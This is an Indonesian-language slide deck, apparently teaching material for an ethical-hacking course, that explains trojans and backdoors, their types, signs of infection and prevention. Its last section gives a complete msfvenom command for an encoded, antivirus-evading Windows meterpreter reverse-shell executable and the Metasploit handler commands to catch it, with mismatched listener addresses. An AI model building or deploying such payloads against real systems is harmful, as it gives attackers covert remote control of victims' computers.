PENDAHULUAN • Trojan dan backdoors dua cara/teknik yang digunakan oleh seorang hacker untuk memperoleh akses ke dalam sebuah sistem. • Trojan & Backdoors memiliki berbagai varietas yang berbeda, memiliki satu kesamaan. • Trojan dan backdoors suatu aplikasi yang berpotensi berbahaya dalam toolkit etika hacker dan harus digunakan secara bijaksana untuk menguji keamanan sistem atau jaringan. PENGERTIAN TROJAN • Trojan adalah aplikasi jahat yang menyamar sebagai aplikasi yang familiar. • Trojan sering didownload bersamaan dengan program lain atau paket perangkat lunak. • Banyak program palsu menjadi perangkat lunak yang sah seperti freeware, alat spyware-removal, pengoptimalan sistem, screen saver, musik, gambar, game, dan video dapat menginstal Trojan pada sistem hanya dengan sedang didownload. • Iklan untuk program gratis, file musik, atau file video FUNGSI TROJAN • Digunakan sebagai poin untuk meluncurkan serangan lain seperti Distributed Denial of Service (DDOS). • Trojan juga digunakan untuk memanipulasi file di komputer korban, mengelola proses, Remote Jarak jauh, melakukan restart serta shutdown. • Bisa melakukan remote ke banyak host, sehingga menyebabkan komputer host menjadi Zombie SEJARAH TROJAN PENGERTIAN BACKDOOR • Backdoor adalah suatu aplikasi yang diinstal pada sistem target untuk memungkinkan akses ke sistem tersebut serta memberikan hacker mendapatkan akses ke sebuah mesin komputer. • Sasaran sebuah backdoor adalah untuk menghapus bukti awal masuk dari file log sistem. APLIKASI TROJAN • Remote Access Trojans (RATs) : digunakan untuk akses remote komputer • Data-Sending Trojans : digunakan untuk mengirimkan file target ke komputer hacker. • Destructive Trojans : digunakan untuk menghancurkan file target. • Denial of Service Trojans : digunakan untuk DDOS • attack Proxy Trojans : digunakan untuk tunnel trafic dengan sistem yang berbeda. • FTP Trojans : digunakan untuk membuat FTP dan menyalin file target. • Security software disabler Trojans : digunakan untuk menghentikan antivirus. INDIKASI KOMPUTER TERINFEKSI TROJAN • Perilaku sistem yang tidak biasa, biasanya merupakan indikasi dari serangan Trojan. • Tindakan seperti program memulai dan menjalankan tanpa inisiasi pengguna, CD-ROM , walpaper, atau screen saver pengaturan berubah dengan sendirinya, tampilan layar membalik terbalik, dan program browser membuka situs yang aneh atau tak terduga semua indikasi dari serangan Trojan. • Setiap tindakan yang mencurigakan atau tidak dimulai oleh pengguna dapat menjadi indikasi dari serangan Trojan. MENCEGAH SERANGAN TROJAN • Gunakan Antivirus yang up-to-date • Gunakan firewall • Tidak menginstal aplikasi yang diunduh dari internet atau membuka lampiran e-mail dari pihak yang tidak dikenal. • Aware terhadap perkembangan Keamanan Informasi. TEKNIK MEMBUAT TROJAN • Banyak cara didalam membuat trojan, salah satu aplikasi yang bisa digunakan adalah msfvenom • Berikut ini command line membuat trojan : • msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.23.103 LPORT=443 -f exe > nama_trojan.exe HASIL DARI MSFVENOM STATUS FILE DARI VIRUSTOTAL.COM EXECUTE TROJAN DENGAN METASPLOIT • Setelah berhasil di create, maka yang perlu dilakukan agar mampu komputer target kita remote yaitu memanggil metasploit • Buka metasploit, lalu ketik perintah ini : • msf> use exploit/multi/handler (enter) • msf> set PAYLOAD windows/meterpreter/reverse_tcp (enter) • msf>set LHOST 192.168.1.1 (enter) • msf>set LPORT 443 (enter) • msf>exploit (enter) Terima Kasih